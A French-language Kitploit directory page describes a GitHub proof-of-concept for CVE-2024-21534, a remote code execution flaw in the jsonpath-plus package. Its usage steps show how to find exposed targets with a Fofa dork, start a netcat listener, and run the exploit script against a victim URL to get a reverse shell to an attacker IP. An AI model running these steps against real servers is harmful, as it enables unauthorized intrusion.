Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus vulnérable à l'exécution de code à distance (RCE) en raison d'une désinfection incorrecte des entrées | Kitploit
Outils/GitHubGitHub/verylazytech/cve-2024-21534
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à Distance
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus vulnérable à l'exécution de code à distance (RCE) en raison d'une désinfection incorrecte des entrées

Voir le dépôt
5140il y a 1 anPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC - CVE-2024-21534 Jsonpath-plus vulnérable à l'exécution de code à distance (RCE) en raison d'une désinfection incorrecte des entrées

My Shop Medium Github Buy Me A Coffee

Aperçu

CVE-2024-21534 est une vulnérabilité critique présente dans les versions du package jsonpath-plus antérieures à la version 10.0.0. La vulnérabilité provient d'une désinfection incorrecte des entrées, ce qui peut conduire à une exécution de code à distance (RCE) sur les systèmes affectés. Cette vulnérabilité est particulièrement dangereuse car elle peut être exploitée sans authentification, permettant à un attaquant d'exécuter du code arbitraire sur le serveur en envoyant une entrée spécialement conçue. Ce problème découle de l'utilisation par défaut non sécurisée du module vm de Node.js, qui, s'il est exploité, pourrait compromettre l'ensemble du système.

Versions affectées

Versions de jsonpath-plus antérieures à 10.2.0

Composants affectés

La vulnérabilité se situe dans le package jsonpath-plus, largement utilisé pour interroger des structures de données JSON dans les applications. Le défaut est dû à une désinfection incorrecte des entrées, permettant l'exécution de code malveillant.

Lisez à ce sujet — CVE-2024-21534

Avertissement : Cette preuve de concept (POC) est réalisée à des fins éducatives et de tests éthiques uniquement. L'utilisation de cet outil pour attaquer des cibles sans consentement préalable mutuel est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage causé par ce programme.

Pour commencer

Trouver des cibles

Pour trouver des cibles potentielles, utilisez Fofa (similaire à Shodan.io) :

  • Fofa Dork : Jsonpath-plus

Fofa

Cloner le dépôt

Tout d'abord, clonez le dépôt :

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

Ouvrez maintenant un listener avec nc :

root@kitploit:~
nc -lnvp 443

Exécuter l'exploit :

Pour Linux / MacOs :

Assurez-vous que l'URL pointe vers un endpoint qui traite les entrées utilisateur via le package jsonpath-plus vulnérable, car cela permettra l'exploitation de la vulnérabilité RCE.

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

Lister quelques répertoires :

last

Télécharger l’outil